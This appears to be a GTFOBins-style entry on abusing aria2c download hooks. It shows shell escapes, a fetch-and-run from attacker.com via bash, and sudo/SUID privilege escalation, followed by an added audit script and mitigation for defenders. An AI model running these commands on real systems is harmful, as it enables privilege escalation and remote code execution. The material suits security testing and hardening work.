Run non-interactive system commands to break out of restricted environments.

COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > "$TF"
chmod +x "$TF"
aria2c --on-download-error="$TF" http://x

The remote file aaaaaaaaaaaaaaaa (must be a string of 16 hex digits) contains the shell script. Note that said file needs to be written on disk in order to be executed. --allow-overwrite is needed if this is executed multiple times with the same GID.

aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
Download remote files. Add --allow-overwrite if needed.

URL=http://attacker.com/file_to_get
LFILE=file_to_save
aria2c -o "$LFILE" "$URL"
If the binary is allowed to run as superuser by sudo, it can be used to access the file system, escalate, or maintain privileged access.

COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > "$TF"
chmod +x "$TF"
sudo aria2c --on-download-error="$TF" http://x
SUID is a type of permission granted to a file that allows users to execute the file with the permissions of the file owner.

COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > "$TF"
chmod +x "$TF"
./aria2c --on-download-error="$TF" http://x
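The sudo and SUID entries above both depend on a misconfiguration that an administrator can audit for: an aria2c binary carrying the setuid bit, or a sudoers rule that lets a user run aria2c. The following POSIX shell script is an added defender-side check, not part of the original page; the function names, the sudoers paths it reads and the sample sudoers text in the usage are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): audit for the two conditions
# the sudo and SUID entries rely on. Function names are hypothetical.

# Return 0 if the given file has the setuid bit set, 1 otherwise.
is_setuid() {
    [ -u "$1" ]
}

# Read sudoers-style text on stdin; return 0 if any non-comment line grants
# aria2c (bare name or common absolute paths), 1 otherwise.
sudoers_allows_aria2c() {
    grep -Ev '^[[:space:]]*#' \
    | grep -Eq '(^|[[:space:],=])(/usr/bin/|/usr/local/bin/|/bin/)?aria2c([[:space:]]|,|$)'
}

# Run both checks against the live system and print findings.
# Sudoers files are only inspected when readable by the current user.
audit_aria2c() {
    bin=$(command -v aria2c 2>/dev/null) || { echo "aria2c not installed"; return 0; }
    if is_setuid "$bin"; then
        echo "FINDING: $bin is setuid; remove the bit with: chmod u-s $bin"
    else
        echo "ok: $bin is not setuid"
    fi
    for f in /etc/sudoers /etc/sudoers.d/*; do
        [ -r "$f" ] || continue
        if sudoers_allows_aria2c < "$f"; then
            echo "FINDING: $f grants aria2c via sudo; the hook options let it run arbitrary commands"
        fi
    done
}

# Usage: sh audit_aria2c.sh --audit
if [ "${1:-}" = "--audit" ]; then
    audit_aria2c
fi
```

The setuid test uses the POSIX `-u` file test rather than parsing `ls` output, and the sudoers match deliberately accepts the bare command name as well as the usual absolute paths so that a rule written either way is reported. Mitigation is the same in both cases: strip the setuid bit and drop the sudo rule, since any download hook option (`--on-download-error`, `--on-download-complete`) executes an arbitrary path with the binary's effective privileges.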